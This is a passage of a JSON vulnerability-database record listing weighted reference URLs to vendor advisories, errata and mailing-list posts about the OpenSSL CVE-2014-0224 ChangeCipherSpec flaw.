"http://rhn.redhat.com/errata/rhsa-2014-0632.html" }, { "trust": 1.9, "url": "http://rhn.redhat.com/errata/rhsa-2014-0627.html" }, { "trust": 1.9, "url": "http://rhn.redhat.com/errata/rhsa-2014-0680.html" }, { "trust": 1.9, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095755" }, { "trust": 1.9, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095754" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683332" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677695" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676644" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676879" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676529" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677836" }, { "trust": 1.9, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095740" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676501" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676035" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677828" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673137" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676419" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677131" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676496" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676478" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676062" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037731" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037732" }, { "trust": 1.9, "url": "http://www.kb.cert.org/vuls/id/978508" }, { "trust": 1.7, "url": "http://security.gentoo.org/glsa/glsa-201407-05.xml" }, { "trust": 1.6, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05301946" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59661" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59301" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59300" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59784" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59413" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59655" }, { "trust": 1.6, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "trust": 1.6, "url": "http://secunia.com/advisories/60522" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59659" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140317760000786\u0026w=2" }, { "trust": 1.6, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-234763.pdf" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=141383465822787\u0026w=2" }, { "trust": 1.6, "url": "https://access.redhat.com/site/blogs/766093/posts/908133" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140784085708882\u0026w=2" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59310" }, { "trust": 1.6, "url": "http://linux.oracle.com/errata/elsa-2014-1053.html" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59666" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58337" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58579" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59305" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59306" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59669" }, { "trust": 1.6, "url": "http://dev.mysql.com/doc/relnotes/workbench/en/wb-news-6-1-7.html" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59429" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676333" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676334" }, { "trust": 1.6, "url": "http://ccsinjection.lepidum.co.jp" }, { "trust": 1.6, "url": "http://support.apple.com/kb/ht6443" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140266410314613\u0026w=2" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140852757108392\u0026w=2" }, { "trust": 1.6, "url": "http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18\u0026id=6061\u0026myns=phmc\u0026mync=e" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58667" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59514" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59878" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59518" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140870499402361\u0026w=2" }, { "trust": 1.6, "url": "http://www.blackberry.com/btsc/kb36051" }, { "trust": 1.6, "url": "http://secunia.com/advisories/60066" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=141025641601169\u0026w=2" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140386311427810\u0026w=2" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59093" }, { "trust": 1.6, "url": "http://www.websense.com/support/article/kbarticle/vulnerabilities-resolved-in-triton-apx-version-8-0" }, { "trust": 1.6, "url": "http://lists.opensuse.org/opensuse-updates/2015-02/msg00030.html" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140369637402535\u0026w=2" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59530" }, { "trust": 1.6, "url": "http://www.novell.com/support/kb/doc.php?id=7015264" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59894" }, { "trust": 1.6, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136470.html" }, { "trust": 1.6, "url": "http://seclists.org/fulldisclosure/2014/jun/38" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58433" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59885" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59525" }, { "trust": 1.6, "url": "https://filezilla-project.org/versions.php?type=server" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=141147110427269\u0026w=2" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677567" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59529" }, { "trust": 1.6, "url": "https://www.intersectalliance.com/wp-content/uploads/release_notes/releasenotes_for_snare_for_mssql.pdf" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59528" }, { "trust": 1.6, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:105" }, { "trust": 1.6, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:106" }, { "trust": 1.6, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00027.html" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59063" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=141383410222440\u0026w=2" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59186" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59189" }, { "trust": 1.6, "url": "http://secunia.com/advisories/61815" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140604261522465\u0026w=2" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59188" }, { "trust": 1.6, "url": "http://secunia.com/advisories/60049" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140544599631400\u0026w=2" }, { "trust": 1.6, "url": "http://secunia.com/advisories/61254" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59190" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140431828824371\u0026w=2" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59192" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59191" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59990" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58660" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59502" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59506" }, { "trust": 1.6, "url": "http://secunia.com/advisories/60176" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59040" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59282" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59163" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59284" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59162" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59043" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59167" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59287" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58742" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676845" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58743" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58745" }, { "trust": 1.6, "url": "http://rhn.redhat.com/errata/rhsa-2014-0624.html" }, { "trust": 1.6, "url": "https://www.imperialviolet.org/2014/06/05/earlyccs.html" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59055" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59175" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140794476212181\u0026w=2" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59721" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140482916501310\u0026w=2" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59602" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58759" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58639" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140621259019789\u0026w=2" }, { "trust": 1.6, "url": "http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18\u0026id=6060\u0026myns=phmc\u0026mync=e" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=142350350616251\u0026w=2" }, { "trust": 1.6, "url": "http://www.securitytracker.com/id/1031032" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59380" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59383" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59264" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59142" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=141658880509699\u0026w=2" }, { "trust": 1.6, "url": "http://rhn.redhat.com/errata/rhsa-2014-0626.html" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59389" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140983229106599\u0026w=2" }, { "trust": 1.6, "url": "http://www.splunk.com/view/sp-caaam2d" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140491231331543\u0026w=2" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677390" }, { "trust": 1.6, "url": "http://www.kerio.com/support/kerio-control/release-history" }, { "trust": 1.6, "url": "http://secunia.com/advisories/60819" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037729" }, { "trust": 1.6, "url": "http://seclists.org/fulldisclosure/2014/dec/23" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140904544427729\u0026w=2" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58977" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59824" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58615" }, { "trust": 1.6, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1103586" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59827" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001843" }, { "trust": 1.6, "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/941-security-advisory-0005" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001841" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59120" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59362" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59483" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59365" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59364" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59004" }, { "trust": 1.6, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676889" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140448122410568\u0026w=2" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58945" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59916" }, { "trust": 1.6, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00016.html" }, { "trust": 1.6, "url": "http://esupport.trendmicro.com/solution/en-us/1103813.aspx" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv61506" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59370" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59491" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59490" }, { "trust": 1.6, "url": "http://puppetlabs.com/security/cve/cve-2014-0224" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59132" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59374" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59495" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59012" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59375" }, { "trust": 1.6, "url": "http://www.novell.com/support/kb/doc.php?id=7015300" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140499864129699\u0026w=2" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59135" }, { "trust": 1.6, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136473.html" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=142805027510172\u0026w=2" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59126" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59368" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58713" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020163" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58714" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58716" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58719" }, { "trust": 1.6, "url": "http://www.securitytracker.com/id/1031594" }, { "trust": 1.6, "url": "http://www.tenable.com/blog/nessus-527-and-pvs-403-are-available-for-download" }, { "trust": 1.6, "url": "http://www.securityfocus.com/archive/1/534161/100/0/threaded" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677080" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58492" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59460" }, { "trust": 1.6, "url": "https://www.intersectalliance.com/wp-content/uploads/release_notes/releasenotes_for_snare_for_windows.pdf" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59101" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59342" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59223" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59215" }, { "trust": 1.6, "url": "http://secunia.com/advisories/60567" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004690" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59214" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58128" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59338" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59459" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676786" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678289" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=142546741516006\u0026w=2" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59231" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59354" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58385" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59347" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59589" }, { "trust": 1.6, "url": "http://secunia.com/advisories/60577" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140852826008699\u0026w=2" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58930" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037761" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=141164638606214\u0026w=2" }, { "trust": 1.6, "url": "http://www.innominate.com/data/downloads/manuals/mdm_1.5.2.1_release_notes.pdf" }, { "trust": 1.6, "url": "https://discussions.nessus.org/thread/7517" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676536" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58939" }, { "trust": 1.6, "url": "http://secunia.com/advisories/60571" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140752315422991\u0026w=2" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59440" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59442" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59441" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59202" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59444" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59435" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59677" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140389355508263\u0026w=2" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59437" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037870" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59438" }, { "trust": 1.6, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095737" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140389274407904\u0026w=2" }, { "trust": 1.6, "url": "https://www.novell.com/support/kb/doc.php?id=7015271" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59451" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59450" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59211" }, { "trust": 1.6, "url": "https://www.ibm.com/support/docview.wss?uid=ssg1s1004670" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140672208601650\u0026w=2" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59454" }, { "trust": 1.6, "url": "https://www.ibm.com/support/docview.wss?uid=ssg1s1004671" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59325" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59446" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59445" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677527" }, { "trust": 1.6, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59448" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59447" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59449" }, { "trust": 1.0, "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commit%3bh=bc8923b1ec9c467755cd86f7848c50ee8812e441" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0224" }, { "trust": 0.6, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=bc8923b1ec9c467755cd86f7848c50ee8812e441" }, { "trust": 0.6, "url": "https://www.suse.com/support/update/announcement/2019/suse-su-201914246-1.html" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.4645/" }, { "trust": 0.6, "url": "https://support.lenovo.com/us/en/solutions/len-24443" }, { "trust": 0.5, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.5, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.5, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.3, "url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10045" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24032618" }, { "trust": 0.3, "url": "http://www.sophos.com/en-us/support/knowledgebase/121112.aspx" }, { "trust": 0.3, "url": "http://sylpheed.sraoss.jp/en/news.html" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10629\u0026cat=sirt_1\u0026actp=list\u0026showdraft=false" }, { "trust": 0.3, "url": "http://www.arubanetworks.com/support/alerts/aid-06062014.txt" }, { "trust": 0.3, "url": "http://googlechromereleases.blogspot.com/2014/06/chrome-for-android-update.html" }, { "trust": 0.3, "url": "http://blogs.citrix.com/2014/06/06/citrix-security-advisory-for-openssl-vulnerabilities-june-2014/" }, { "trust": 0.3, "url": "http://bugs.python.org/issue21671" }, { "trust": 0.3, "url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10046" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004805" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2014/aug/att-93/esa-2014-079.txt" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04438404" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687640" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21682840" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678123" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678073" }, { "trust": 0.3, "url": "http://www.websense.com/support/article/kbarticle/july-2014-hotfix-summary-for-websense-solutions" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10643\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://jvn.jp/en/jp/jvn61247051/index.html" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "http://blogs.sophos.com/2014/06/10/openssl-man-in-the-middle-vulnerability-sophos-product-status-2/" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100181245" }, { "trust": 0.3, "url": "http://www.innominate.com/data/downloads/software/innominate_security_advisory_20140606_001_en.pdf" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004758" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004747" }, { "trust": 0.3, "url": "http://openvpn.net/index.php/open-source/downloads.html" }, { "trust": 0.3, "url": "http://www8.hp.com/us/en/software-solutions/operations-analytics-operations-analysis/" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686583" }, { "trust": 0.3, "url": "https://community.rapid7.com/community/metasploit/blog/2014/06/05/security-advisory-openssl-vulnerabilities-cve-2014-0224-cve-2014-0221-in-metasploit" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685551" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096059" }, { "trust": 0.3, "url": "http://blogs.splunk.com/2014/06/09/splunk-and-the-latest-openssl-vulnerabilities/" }, { "trust": 0.3, "url": "http://www.marshut.com/ixwnpv/stunnel-5-02-released.html" }, { "trust": 0.3, "url": "http://blogs.sophos.com/2014/06/16/utm-up2date-9-113-released/" }, { "trust": 0.3, "url": "http://blogs.sophos.com/2014/06/18/utm-up2date-9-203-released/" }, { "trust": 0.3, "url": " https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04404764" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04385138" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100181099" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/101007404" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100180978" }, { "trust": 0.3, "url": "http://ics-cert.us-cert.gov/advisories/icsa-14-198-03" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/mar/21" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/mar/9" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10659" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03d" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03g" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-094-04" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100181096" }, { "trust": 0.3, "url": "http://btsc.webapps.blackberry.com/btsc/viewdocument.do;jsessionid=98ec479ee69ccb916d2ea4b09943faf5?nocount=true\u0026externalid=kb36051\u0026sliceid=1\u0026cmd=\u0026forward=nonthreadedkc\u0026command=show\u0026kcid=kb36051\u0026viewe" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678040" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1it02314" }, { "trust": 0.3, "url": "http://kb.parallels.com/en/121916" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24036409" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24032650#5.0.0.15" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24032651" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24034955" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1020948" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04401858" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04355095" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04397114" }, { "trust": 0.3, "url": " https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479505" }, { "trust": 0.3, "url": "http://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04512909" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04343424" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04368264" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04347622" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04345210" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04347711" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04349175" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04349789" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04349897" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docdisplay?docid=emr_na-c04351097" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04363613" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04368546" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04370307" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04378799" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04379485" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04392919" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04398968" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04401666" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04337774" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04451722" }, { "trust": 0.3, "url": 